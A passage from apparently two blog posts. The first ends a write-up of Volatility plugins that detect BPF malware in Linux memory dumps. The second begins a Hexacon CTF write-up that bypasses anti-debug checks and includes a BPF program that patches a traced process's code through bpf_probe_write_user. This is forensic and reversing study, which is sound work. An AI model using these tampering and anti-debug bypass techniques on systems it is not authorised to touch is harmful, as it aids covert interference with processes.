0x8: 77 00 00 00 20 00 00 00                         rsh64 r0, 0x20
0x10: 18 01 00 00 00 a0 49 00 00 00 00 00 e5 bc ff ff lddw r1, 0xffffbce50049a000
0x20: 61 11 00 00 00 00 00 00                         ldxw r1, [r1]
0x28: 5d 01 05 00 00 00 00 00                         jne r1, r0, +0x5
0x30: 18 01 00 00 10 83 83 f5 00 00 00 00 7b 9b ff ff lddw r1, 0xffff9b7bf5838310
0x40: b7 02 00 00 1c 00 00 00                         mov64 r2, 0x1c
0x48: bf 03 00 00 00 00 00 00                         mov64 r3, r0
0x50: 85 00 00 00 80 0c ff ff                         call 0xffff0c80
0x58: b7 00 00 00 00 00 00 00                         mov64 r0, 0x0
0x60: 95 00 00 00 00 00 00 00                         exit 

# cat .prog_0xbce500673000_98_mdisasm

handle_tp:
 0xffffc03772a0: 0f 1f 44 00 00                               nop dword ptr [rax + rax]
 0xffffc03772a5: 66 90                                        nop
 0xffffc03772a7: 55                                           push rbp
 0xffffc03772a8: 48 89 e5                                     mov rbp, rsp
 0xffffc03772ab: e8 d0 fc aa f1                               call 0xffffb1e26f80       # bpf_get_current_pid_tgid
 0xffffc03772b0: 48 c1 e8 20                                  shr rax, 0x20
 0xffffc03772b4: 48 bf 00 a0 49 00 e5 bc ff ff                movabs rdi, 0xffffbce50049a000    # minimal_.bss + 0x110
 0xffffc03772be: 8b 7f 00                                     mov edi, dword ptr [rdi]
 0xffffc03772c1: 48 39 c7                                     cmp rdi, rax
 0xffffc03772c4: 75 17                                        jne 0xffffc03772dd        # handle_tp + 0x3d
 0xffffc03772c6: 48 bf 10 83 83 f5 7b 9b ff ff                movabs rdi, 0xffff9b7bf5838310    # minimal_.rodata + 0x110
 0xffffc03772d0: be 1c 00 00 00                               mov esi, 0x1c
 0xffffc03772d5: 48 89 c2                                     mov rdx, rax
 0xffffc03772d8: e8 13 57 a7 f1                               call 0xffffb1dec9f0       # bpf_trace_printk
 0xffffc03772dd: 31 c0                                        xor eax, eax
 0xffffc03772df: c9                                           leave
 0xffffc03772e0: c3                                           ret
 0xffffc03772e1: cc                                           int3

The first lesson here is probably that symbol annotations are useful :). As expected, when ignoring the prologue and epilogue inserted by the JIT-compiler, the translation between BPF and x86_64 is essentially one-to-one. Furthermore, uses of global C variables like my_pid or the format string result in direct references to kernel memory, where the closest preceding symbols are the minimal_.bss’s and minimal_.rodata’s bpf_map structures, respectively. For simple array maps, the bpf_map structure resides at the beginning of a buffer that also holds the array data, 0x110 is simply the offset at which the map’s payload data starts. More generally, libbpf will automatically create maps to hold the variables living in the .data, .rodata, and .bss sections.

Dumping the map contents confirms that the .bss map holds the minimal process’s PID while the .rodata map contains the format string.

# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 45 40 --dump
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0xbce500499ef0  40      ARRAY   minimal_.bss    4       4       1
0x9b7bf5838200  45      ARRAY   minimal_.rodata 4       28      1
# cat .map_0xbce500499ef0_40
{"0": "section (.bss) = {\n (my_pid) (int) b'\\xb7\\x02\\x00\\x00'\n"}
# cat .map_0x9b7bf5838200_45
{"0": "section (.rodata) = {\n (handle_tp.____fmt) b'BPF triggered from PID %d.\\n\\x00'\n"}

In the source code we saw the directive SEC("tp/syscalls/sys_enter_write"), which instructs the compiler to place the handle_tp function’s BPF bytecode in an ELF section called "tp/syscalls/sys_enter_write". While loading, libbpf picks this up and creates a link that attaches the program to a perf event that is activated by the sys_enter_write tracepoint. We can inspect the link, but getting more information about the corresponding trace point is not yet implemented. Contributions are always highly welcome :)

# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listlinks --id 11
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    PROG    ATTACH

0x9b7bc2c09ae0  11      PERF_EVENT      98

Dissecting the “Hello, World” programm was useful to get an impression of what a BPF application looks like at runtime. Before concluding this section, we will have a look at a less minimalist example, the process with PID 687.

This process is one of the kernel self-tests. It tests a BPF feature that allows to load new function pointer tables used for dynamic dispatch (so called structure operations), where the individual operations are implemented as BPF programs, at runtime. The programs that implement the new operations can be recognized by their type STRUCT_OPS.

# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 37 39 40 42 43 44 45
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce5003b7000  37      STRUCT_OPS      dctcp_init      562160e42a59841c        1417427431243   9,10,7  124     bpf_sk_storage_get,bpf_sk_storage_delete
0xbce50046b000  39      STRUCT_OPS      dctcp_ssthresh  cddbf7f9cf9b52d7        1417427590219   9       124
0xbce500473000  40      STRUCT_OPS      dctcp_update_alpha      6e84698df8007e42        1417427647277   9       124
0xbce500487000  42      STRUCT_OPS      dctcp_state     dc878de7981c438b        1417427777414   9       124
0xbce500493000  43      STRUCT_OPS      dctcp_cwnd_event        70cbe888b7ece66f        1417427888091   9       124     bpf_tcp_send_ack
0xbce5004e5000  44      STRUCT_OPS      dctcp_cwnd_undo 78b977678332d89f        1417428066805   9       124
0xbce5004eb000  45      STRUCT_OPS      dctcp_cong_avoid        20ff0d9ab24c8843        1417428109672   9       124     tcp_reno_cong_avoid

The mapping between the programs and the function pointer table they implement is realized through a special map of type STRUCT_OPS created by the process.

# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listmaps --id 11 12
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    KEY SIZE        VALUE SIZE      MAX ENTRIES

0x9b7bc3c41000  11      STRUCT_OPS      dctcp_nouse     4       256     1
0x9b7bc3c43400  12      STRUCT_OPS      dctcp   4       256     1

Unfortunately, the current implementation does not parse the contents of the map, so it cannot determine the name of the kernel structure being implemented and the mapping between its member functions and the BPF programs. As always, contributions are highly welcome :). In this case, we would find out that it implements tcp_congestion_ops to load a new TCP congestion control algorithm on the fly.

There is a lot more to explore in this memory image, so feel free to have a closer look at the other processes. You might also want to check out the krie example in our documentation to get an impression of a larger BPF application.

Testing

We tested the plugins on memory images acquired from virtual machines running on QEMU/KVM that were suspended for the duration of the acquisition process. To ensure the correctness of all plugin results, we have cross-checked them by debugging the guest kernel as well as comparing them with bpftool running on the guest.

Below is a list of the distributions and releases that we used for manual testing

Debian

12.2.0-14, Linux 6.1.0-13

Ubuntu

22.04.2, Linux 5.15.0-89-generic
20.04, Linux 5.4.0-26-generic

Custom

Linux 6.0.12, various configurations
Linux 6.2.12, various configurations

For each of these kernels, we tested at least all the plugins on an image taken during the execution of the libbpf-bootstrap example programs.

Additionally, to the above mentioned kernels we also developed an evaluation framework (the code is not public). The framework is based on Vagrant and libvirt/KVM. First we create and update all VMs. After that we run programs from libbpf-bootstrap with nohup so that we can leave the VM and dump the memory from outside. To dump the memory we use virsh with virsh dump <name of VM> --memory-only. virsh dump pauses the VM for a clean acquisition of the main memory. We also install debug symbols for all the Linux distributions under investigation so that we can gather the debug kernels (vmlinux with DWARF debugging information) and the System.map file. We then use both files with dwarf2json to generate the ISF information that Volatility 3 needs. Currently, we tested the following Linux distributions with their respective kernels:

Alma Linux 9 - Linux kernel 5.14.0-362.8.1.el9_3.x86_64 ✅
Fedora 38 - Linux kernel 6.6.6-100.fc38.x86_64 ✅
Fedora 39 - Linux kernel 6.6.6-200.fc39.x86_64 ✅
CentOS Stream 9 - Linux kernel 5.14.0-391.el9.x86_64 ✅
Rocky Linux 8 - Linux kernel 4.18.0-513.9.1.el8_9.x86_64 ✅
Rocky Linux 9 - 🪲 kernel-debuginfo-common package is missing so the kernel debugging symbols cannot be installed (list of packages)
Debian 11 - Linux kernel 5.10.0-26-amd64 ✅
Debian 12 - Linux kernel 6.1.0-13-amd64 ✅
Ubuntu 22.04 - Linux kernel 5.15.0-88-generic ✅
Ubuntu 23.10 - Linux kernel 6.5.0-10-generic ✅ (works partially, but process listing is broken due to this dwarf2json GitHub Issue)
ArchLinux - Linux kernel 6.6.7-arch1-1 ✅ (works partially, but breaks probably due to the same issue as volatility3/dwarf2json GitHub Issue)
openSUSE Tumbleweed - 🪲 we currently did not find the debugging symbols in the debugging kernel (openSUSE Bugzilla)

We will check if the problems get resolved and re-evaluate our plugin. Generally, our framework is designed to support more distributions as well and we will try to evaluate the plugin on a wider variety of them.

During our automated analysis we encountered an interesting problem. To collect the kernels with debugging symbols from the VMs we need to copy them to the host. When copying the kernel executable file it will be read into main memory by the kernel’s page-cache mechanism. This implies that parts of the kernel file (vmlinux) and the kernel itself (the running kernel not the file) may be present in the dump. This can lead to the problem of the Volatility 3 function find_aslr (source code) first finding matches in the page-cached kernel file (vmlinux) and not in the running kernel. An issue has been opened here.

There are several articles on BPF that cover different security-related aspects of the subsystem. In this section, we will briefly discuss the ones that are most relevant to the presented work.

Memory Forensics: The crash utility, which is used to analyze live systems or kernel core dumps, has a bpf subcommand that can be used to display information about BPF maps and programs. However, as it is not a forensics tool it relies solely on the information obtained via the prog_idr and map_ird. Similarly, the drgn programmable debugger comes with a script to list BPF programs and maps but suffers from the same problems when it comes to anti-forensic techniques. Furthermore, drgn and crash are primarily known as debugging tools for systems developers and as such not necessarily well-established in the digital forensics and incidence response (DFIR) community. In contrast, we implemented our analyses as plugins for the popular Volatility framework well-known in the DFIR community. Finally, A. Case and G. Richard presented Volatility plugins for investigating the Linux tracing infrastructure in their BlackHat US 2021 paper. Apart from a plugin that lists programs by parsing the prog_idr, they have also implemented several plugins that can find BPF programs by analyzing the data structures of the attachment mechanisms they use, such as kprobes, tracepoints or perf events. Thus, their plugins are also able to discover inconsistencies that could reveal anti-forensic tampering. However, they have never publicly released their plugins and despite several attempts we have been unable to contact the authors to obtain a copy of the source code. Volatility already supports detecting BPF programs attached to sockets in its sockstat plugin. The displayed information is limited to names and IDs.

Reverse Engineering: Reverse engineering BPF programs is a key step while triaging the findings of our plugins. Recently, the Ghidra software reverse engineering (SRE) suite gained support for the BPF architecture, which means that its powerful decompiler can be used to analyze BPF bytecode extracted from kernel memory or user-space programs. Furthermore, BPF bytecode is oftentimes embedded into user-space programs that use framework libraries to load it into the kernel at runtime. For programs written in the Go programming language, ebpfkit-monitor can parse the binary format of these embedded files to list the defined programs and maps as well as their interactions. It uses this information to generate graphs that are similar to those of our bpf_graph plugin. Although the utility of these graphs has inspired our plugin, it is fundamentally different in that it displays information about the state of the kernel’s BPF subsystem extracted from a memory image. Consequently, it is inherently agnostic to the user-space framework that was used for compiling and loading the programs. Additionally, it displays the actual state of the BPF subsystem instead of the BPF objects that might be created by an executable at runtime.

Runtime Protection and Monitoring: Important aspects of countering BPF malware are preventing attackers from loading malicious BPF programs and logging suspicious events for later review. krie and ebpfkit-monitor are tools that can be used to log BPF-related events as well as to deny processes access to the BPF system call.

Simply blocking access on a per-process basis is too course-grained for many applications and thus multiple approaches were proposed to implement a more fine-grained access control model for the BPF subsystem to facilitate the realization of least privilege policies. Among those, one can further distinguish between proposals that implement access control in user space, kernel space, or a hypervisor.

bpfman (formerly known as bpfd) is a privileged user space daemon that acts as proxy for loading BPF programs and can be used to implement different access control policies. A combination of a privileged user-space daemon and kernel changes is used in the proposed BPF token approach that allows delegation of access to specific parts of the BPF subsystem to container processes by a privileged daemon.

A fine-grained in-kernel access control is offered by the CapBits proposed by Yi He et al. Here, two bitfields are added to the task_struct, where one defines the access that a process has to the BPF subsystem, e.g., allowed program types and helpers, and the other restricts the access that BPF programs can have on the process, e.g., to prevent it from being traced by kprobe programs. Namespaces are already used in many areas of the Linux kernel to virtualize global resources like PIDs or network devices. Thus, Y. Shao proposed introducing BPF namespaces to limit the scope of loaded programs to processes inside of the namespace. Finally, signatures over programs are a mechanism that allows the kernel to verify their provenance, which can be used analogous to module signatures that prevent attackers from loading malicious kernel modules.

Lastly, Y. Wang et al. proposed moving large parts of the BPF VM from the kernel into a hypervisor, where they implement a multi-step verification process that includes enforcing a security policy, checking signatures, and scanning for known malicious programs. In the security policy, allowed programs can be specified as a set of deterministic finite automata, which allows for accepting dynamically generated programs without allowing for arbitrary code to be loaded.

All these approaches are complementary to our plugins as they focus on reducing the chance that an attacker can successfully load a malicious program, while we assume that this step has already happened and aim to detect their presence.

Conclusion

In this post, we gave an introduction to the Linux BPF subsystem and discussed its potential for abuse. We then presented seven Volatility plugins that allow investigators to detect BPF malware in memory images and evaluated them on multiple versions of popular Linux distributions. To conclude the post, we will briefly discuss related projects we are working on and plans for future work.

This project grew out of the preparation of a workshop on BPF rootkits at the DFRWS EU 2023 annual conference (materials). We began working on this topic because we believe that the forensic community needs to expand its toolbox in response to the rise of BPF in the Linux world to fill blind spots in existing analysis methods. Additionally, investigators who may encounter BPF in their work should be made aware of the potential relevance of the subsystem to their investigation.

While the workshop, our plugins, and this post are an important step towards this goal, much work remains to be done. First, in order for the present work to be useful in the real world our next goal must be to upstream most of it into the Volatility 3 project. Only this will ensure that investigators all around the world will be able to easily find and use it. This will require:

Refactoring of our utility code to use Volatility 3’s extension class mechanism
The bpf_graph plugin relies on networkx, which is not yet a dependency of Volatility 3. If the introduction of a new dependency into the upstream project is not feasible, one could make it optional by checking for the presence of the package within the plugin.
Additional testing on older kernel versions and kernels with diverse configurations to meet Volatility’s high standards regarding compatibility

We will be happy to work with upstream developers to make the integration happen.

Furthermore, there remains the problem of dealing with the wide variety of map types when extracting their contents, as well as the related problem of pretty-printing them using BTF information. Here, we consider a manual implementation approach to be impractical and would explore the possibility of using emulation of the relevant functions.

Regarding the advanced analysis aimed at countering anti-forensics, we have also implemented consistency checks against the lists of kprobes and tracepoints, but these require further work to be ready for publication. We also described additional analyses in our workshop that still need to be implemented.

Finally, an interesting side effect of the introduction of BPF into the Linux kernel is that most of the functionality requires BTF information for the kernel and modules to be available. This provides an easy solution to the problem of obtaining type information from a raw memory image, a step that is central to automatic profile generation. We have already shown that it is possible to reliably extract BTF sections from memory images by implementing a plugin for that. We have also explored the possibility of combining this with existing approaches for extracting symbol information in order to obtain working profiles from a dump. While the results are promising, further work is needed to have a usable solution.

Appendix

A: Kernel Configuration

This section provides a list of compile-time kernel configuration options that can be adjusted to restrict the capabilities of BPF programs. In general, it is recommended to disable unused features in order to reduce the attack surface of a system.

BPF_SYSCALL=n: Disables the BPF system call. Probably breaks most systemd-based systems.
DEBUG_INFO_BTF=n: Disables generation of BTF debug information, i.e., CORE no longer works on this system. Forces attackers to compile on/for the system they want to compromise.
BPF_LSM=n: BPF programs cannot be attached to LSM hooks.
LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y: Prohibits the use of bpf_probe_write_user.
NET_CLS_BPF=n and NET_ACT_BPF=n: BPF programs cannot be used in TC classifier actions. Stops some data exfiltration techniques.
FUNCTION_ERROR_INJECTION=n: Disables the function error injection framework, i.e., BPF programs can no longer use bpf_override_return.
NETFILTER_XT_MATCH_BPF=n: Disables option to use BPF programs in nftables rules. Could be used to implement malicious firewall rules.
BPF_EVENTS=n: Removes the option to attach BPF programs to kprobes, uprobes, and tracepoints.

Below are options that limit features that we consider less likely to be used by malware.

BPFILTER=n: This is an unfinished BPF-based replacement of iptables/nftables (currently not functional).
LWTUNNEL_BPF=n: Disables the use of BPF programs for routing decisions in light weight tunnels.
CGROUP_BPF=n: Disables the option to attach BPF programs to cgoups. Cgroup programs can monitor various networking-related events of processes in the group. Probably breaks most systemd-based systems.

Solving Binary Gecko’s Hexacon CTF with frida and angr [stage 1, Linux]

2023-10-20T00:00:00+00:00

This year’s Hexacon featured several CTFs hosted by some of the sponsoring companies. This post is a brief writeup of my solution for the stage-one Linux challenge by Binary Gecko, a “[…] provider of comprehensive and specialized cybersecurity solutions to businesses and institutions of all sizes.”, aha.

tl;dr: Work around a bunch of anti-debug techniques to dump a second-stage payload. Use angr (after convincing it to load the malformatted dump) to solve a standard crackme that yields the flag. Then validate that it is correct, using frida to work around some more anti-debug annoyances.

Overview

We are given a static binary without any symbols or useful strings, but with an rwx segment, great. Running it just tells us to ‘Get out!’.

% readelf --segments hexalinux.bin

Elf file type is EXEC (Executable file)
Entry point 0x2000c0
There are 2 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000200000 0x0000000000200000
                 0x0000000000003a87 0x0000000000003a87  RWE    0x200000
  LOAD           0x0000000000003a87 0x0000000000a03a87 0x0000000000a03a87
                 0x0000000000004010 0x0000000000004010  RW     0x200000
% file hexalinux.bin
hexalinux.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
% ./hexalinux.bin
Get out!!

Furthermore, throwing it into a disassembler shows many unprocessed regions, indicating some sort of packing.

Anti-Debug Vol. 1

Using strace shows us the first anti-debug technique: the binary checks /proc/self/status. Usually this is a check of the “TracerPid” value to detect the presence of a debugger.

% strace ./hexalinux.bin
execve("./hexalinux.bin", ["./hexalinux.bin"], 0x70bb0b5efd70 /* 43 vars */) = 0
getpid()                                = 34999
stat("/proc/34999/status", {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
open("/proc/34999/status", O_RDONLY)    = 3
read(3, "Name:\thexalinux.bin\nUmask:\t0022\n"..., 4095) = 1207
close(3)                                = 0
exit(0)                                 = ?

At this point, I went searching for a gdb script I use in those situations. Using my favorite decompiler, I made a list of all the syscall addresses in the binary.

[x[0] for x in [[i[1] for i in f.instructions if str(i[0][0]) == 'syscall'] for f in bv.functions] if x]

The script simply uses them to place a breakpoint before and after each syscall instruction. Combining this with a tool to convert syscall numbers to names, we got ourselves a poor-mans strace! We can also automate the bypassing of the first anti-debug check by simply overwriting the string that was read from the status file.

Anti-Debug Vol. 2

Running the binary under our ad-hock strace shows a call to fork and then many ptrace invocations - it seems that the first process is spawning another process and then does some fun stuff to it. However, we soon exit due to some other anti-debug check.

SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x13f2
SYS_stat(arg1=0x7fffffffd340,arg2=0x7fffffffd3c0,arg3=0x7fffffffd32f,arg4=0x7fffffffd3c0,arg5=0x0) -> 0x0
SYS_open(name=0x7fffffffd340:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x3
SYS_read(fd=0x3,buf=0x7fffffffd450,n=0xfff,arg4=0xfff,arg5=0x3) -> 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd450,arg3=0xfff,arg4=0xfff,arg5=0x0) -> 0x0
[Detaching after fork from child process 5109]
SYS_fork(arg1=0x7fffffffd450,arg2=0x7fffffffd315,arg3=0x7fffffffd45b,arg4=0xfff,arg5=0x0) -> 0x13f5
SYS_rt_sigaction(arg1=0x5,arg2=0x7fffffff6970,arg3=0x0,arg4=0x8,arg5=0x0) -> 0x0
SYS_mmap(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0xffffffff) -> 0x7ffff7ef9000
SYS_getpid(arg1=0x0,arg2=0x100000,arg3=0x3,arg4=0x22,arg5=0x0) -> 0x13f2
SYS_stat(arg1=0x7fffffff6a60,arg2=0x7fffffff6d60,arg3=0x7fffffff6a1f,arg4=0x7fffffff6d60,arg5=0x0) -> 0x0
SYS_open(name=0x7fffffff6a60:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x3
SYS_read(fd=0x3,buf=0x7fffffff72d0,n=0xfff,arg4=0xfff,arg5=0x3) -> 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff72d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -> 0x0
SYS_prctl(arg1=0x4,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x0
SYS_ptrace(arg1=0x4200,arg2=0x13f5,arg3=0x0,arg4=0x10005e,arg5=0x0) -> 0x0
SYS_ptrace(arg1=0x7,arg2=0x13f5,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x0
SYS_wait4(arg1=0x13f5,arg2=0x7fffffff69ac,arg3=0x40000001,arg4=0x0,arg5=0x0) -> 0x13f5
SYS_getpid(arg1=0x13f5,arg2=0x7ffff7ef9020,arg3=0x7f,arg4=0x0,arg5=0x0) -> 0x13f2
SYS_stat(arg1=0x7fffffff6ae0,arg2=0x7fffffff6df0,arg3=0x7fffffff6a2f,arg4=0x7fffffff6df0,arg5=0x0) -> 0x0
SYS_open(name=0x7fffffff6ae0:   "/proc/5106/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x3
SYS_read(fd=0x3,buf=0x7fffffff82d0,n=0xfff,arg4=0xfff,arg5=0x3) -> 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffff82d0,arg3=0xfff,arg4=0xfff,arg5=0x0) -> 0x0

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0000000000201496 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
[!] Command 'registers' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
[!] Command 'dereference' failed to execute properly, reason: [Errno 13] Permission denied: '/proc/35415/maps'
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x201489                  jne    0x201002
     0x20148f                  mov    eax, DWORD PTR [rip+0x24db]        # 0x203970
     0x201495                  int3
 →   0x201496                  add    eax, 0x1
     0x201499                  cmp    eax, DWORD PTR [rip+0x24d1]        # 0x203970
     0x20149f                  jne    0x201002
     0x2014a5                  xor    eax, eax
     0x2014a7                  call   0x2026a0
     0x2014ac                  mov    r8d, eax
───────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hexalinux_patch", stopped 0x201496 in ?? (), reason: SIGTRAP
─────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x201496 → add eax, 0x1

There are two interesting things here: we cannot access the /proc/self/maps of the debuggee and there is a breakpoint instruction which we did not put there.

The reason behind the first issue is the call to SYS_prctl that we can see in the trace above. It is made with the PR_SET_DUMPABLE parameter. Apart from the obvious effect of disabling core dumps, this affects the ownership rules of the process’ proc files, which is why our debugger cannot access them anymore. I simply used the gdb script to turn the call to prctl into a call SYS_close(-1), i.e., a no-op, and afterwards adjusted the return value to indicate success.

The second observation is more interesting. As we can see in the above trace, the process calls SYS_rt_sigaction to set the signal handler for the SIGTRAP signal to a function at 0x202070.

00202070  int64_t sigtrap_handler()

00202070  f30f1efa           endbr64
00202074  8305f518000001     add     dword [rel data_203970], 0x1
0020207b  c3                 retn     {__return_addr}

00202080  uint64_t adbg_set_sigtrap_handler()

00202080  f30f1efa           endbr64
00202084  4883ec28           sub     rsp, 0x28
00202088  31d2               xor     edx, edx  {0x0}
0020208a  bf05000000         mov     edi, 0x5
0020208f  4889e6             mov     rsi, rsp {var_28}
00202092  48c7442418ffffff…  mov     qword [rsp+0x18 {var_10}], 0xffffffffffffffff
0020209b  48c7042470202000   mov     qword [rsp {var_28}], sigtrap_handler
002020a3  48c7442408000000…  mov     qword [rsp+0x8 {var_20}], 0x4000000
002020ac  48c7442410602020…  mov     qword [rsp+0x10 {var_18}], data_202060
002020b5  e806060000         call    sigaction
002020ba  85c0               test    eax, eax
002020bc  7805               js      0x2020c3

002020be  4883c428           add     rsp, 0x28
002020c2  c3                 retn     {__return_addr}

002020c3  31ff               xor     edi, edi  {0x0}
002020c5  e816040000         call    exit

Your disassembler probably did not catch that upper function on the first round, but it simply increments the memory at 0x203970 by one. The code around the breakpoint then validates that the handler runs when executing the int3 instruction, cool. Of course the handler will not run when we are debugging, which is another thing we can fix with the script.

Anti-Debug Vol. 3

Even with all these countermeasures in place, I still crashed due to an invalid memory reference. It happened at a seemingly arbitrary point while debugging the child process (before the parent attaches to it). When executing

SYS_getpid(arg1=0x0,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x147a
SYS_stat(arg1=0x7fffffffd350,arg2=0x7fffffffd3d0,arg3=0x7fffffffd33f,arg4=0x7fffffffd3d0,arg5=0x0) -> 0x0
SYS_open(name=0x7fffffffd350:   "/proc/5242/status"
,arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x3
SYS_read(fd=0x3,buf=0x7fffffffd460,n=0xfff,arg4=0xfff,arg5=0x3) -> 0x4b0
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd460,arg3=0xfff,arg4=0xfff,arg5=0x0) -> 0x0
[Attaching after process 5242 fork to child process 5245]
[New inferior 2 (process 5245)]
[Detaching after fork from parent process 5242]
[Inferior 1 (process 5242) detached]
SYS_fork(arg1=0x7fffffffd460,arg2=0x7fffffffd325,arg3=0x7fffffffd46b,arg4=0xfff,arg5=0x0) -> 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -> 0x0
SYS_getpid(arg1=0x7fffffffe480,arg2=0x7fffffffd340,arg3=0x7fffffffd46b,arg4=0x7fffffffd340,arg5=0x0) -> 0x147d
SYS_stat(arg1=0x7fffffffd330,arg2=0x7fffffffd3b0,arg3=0x7fffffffd29f,arg4=0x7fffffffd3b0,arg5=0x0) -> 0x0
SYS_open(name=0x7fffffffd330:   "/proc/5245/status",arg2=0x0,arg3=0x0,arg4=0x0,arg5=0x0) -> 0x3
SYS_read(fd=0x3,buf=0x7fffffffd440,n=0xfff,arg4=0xfff,arg5=0x3) -> 0x4b1
[+] remove TracerPid
SYS_close(arg1=0x3,arg2=0x7fffffffd440,arg3=0xfff,arg4=0xfff,arg5=0x0) -> 0x0
SYS_setrlimit(arg1=0x4,arg2=0x7fffffffd2a0,arg3=0x7,arg4=0x7fffffffd2a0,arg5=0x0) -> 0x0

Thread 2.1 "hexalinux_patch" received signal SIGBUS, Bus error.
[...]
$rbp   : 0x89a770da45244a2e
[...]
 →   0x2003be                  mov    eax, DWORD PTR [rbp+0x0]

rbp was always holding some garbage value. At this point I got kind of annoyed and started patching the code, however, this only increased my dissatisfaction as it turned out that the binary detects code modifications and gets trapped in an endless loop, charming.

I did not investigate these two issues further, but one of the other two (yea, there are more) anti-debug measures performed by the child lead me on the right track.

Anti-Debug Vol. 4

The first thing that the child does is setting the resource limit for the maximal core dump size to zero, i.e., SYS_setrlimit(0x4...). That’s not a problem as we can bypass it by turning it into a no-op close(-1) via the debugger. However, the second activity is more interesting: the child sanitizes its environment variables on the stack, removing some variables interpreted by the dynamic linker … interesting: why care about those variables in a static binary?

Aside: (I guess) that there is a bug when sanitizing the stack:

00202100  char** adbg_sanitize_env(void* argcp)

00202100  f30f1efa           endbr64
00202104  53                 push    rbx {__saved_rbx}
00202105  488d4708           lea     rax, [rdi+0x8]
00202109  4883ec20           sub     rsp, 0x20
0020210d  0f1f00             nop     dword [rax], eax

00202110  4889c2             mov     rdx, rax
00202113  4883c008           add     rax, 0x8
00202117  48833800           cmp     qword [rax], 0x0
0020211b  75f3               jne     0x202110
...

Since rdi points to points to argc, the first loop, which is meant to skip the argument vector argv, actually skips the environment variables when the program is executed with no arguments at all (yes, argv[0] is optional).

Change of Strategy

As it didn’t look like I could debug either parent or child with any meaningful results, and reversing the binary statically didn’t look fun either, (especially due do the poking of the parent via ptrace that makes it hard to reason about the child’s control flow, some obvious second stage unpacking, and potentially self-modifying code) I decided to switch tracks.

Remember that the binary printed “Get out!” to stdout? The disassembly I was looking at did not even contain a write system call! At first, I was suspecting that the write syscall would be made from shellcode, so I wrote a small BPF program that hooks the write syscall and overwrite the code after the syscall instruction with an endless loop, i.e., jmp 0x0. This would allow me to inspect whichever process made the syscall, or at least I hoped so.

SEC("tp/syscalls/sys_enter_write")
int tp_sys_enter_write(struct trace_event_raw_sys_exit* tp)
{
  struct task_struct* task = NULL;
  struct pt_regs* regs = NULL;
  int argc = 0, i = 0, ret = 0;
  char buf[16] = { 0 };
  void *ip = 0;

  // only hook child and parent
  if (bpf_get_current_comm((void*)buf, sizeof(buf))) {
    bpf_printk("error: bpf_get_current_comm\n");
    return 0;
  }
  if (__builtin_memcmp(buf, "hexalinux", 9)) {
    return 0;
  }

  // get address of insn after `syscall`
  task = (struct task_struct*)bpf_get_current_task_btf();
  regs = (struct pt_regs*)bpf_task_pt_regs(task);
  ip = (void*)BPF_CORE_READ(regs, ip);

  bpf_printk("IP: 0x%lx\n", (uint64_t)ip);

  // 0:  e9 fb ff ff ff          jmp    0x0
  if(bpf_probe_write_user(ip, "\xE9\xFB\xFF\xFF\xFF", 5)) {
    bpf_printk("error: bpf_probe_write_user\n");
    return 0;
  }

  bpf_printk("success: hooked return address\n");

  return 0;
}

Executing the binary with the BPF program loaded lead to some surprising results (those are the logs of three distinct runs).

hexalinux.bin-5416    [004] ...21 10744.055618: bpf_trace_printk: IP: 0x7f08d2da3034
hexalinux.bin-5416    [004] ...21 10744.055622: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5418    [009] ...21 10749.195558: bpf_trace_printk: IP: 0x7fd507691034
hexalinux.bin-5418    [009] ...21 10749.195561: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5420    [004] ...21 10749.614267: bpf_trace_printk: IP: 0x7f4b510b8034
hexalinux.bin-5420    [004] ...21 10749.614270: bpf_trace_printk: error: bpf_probe_write_user

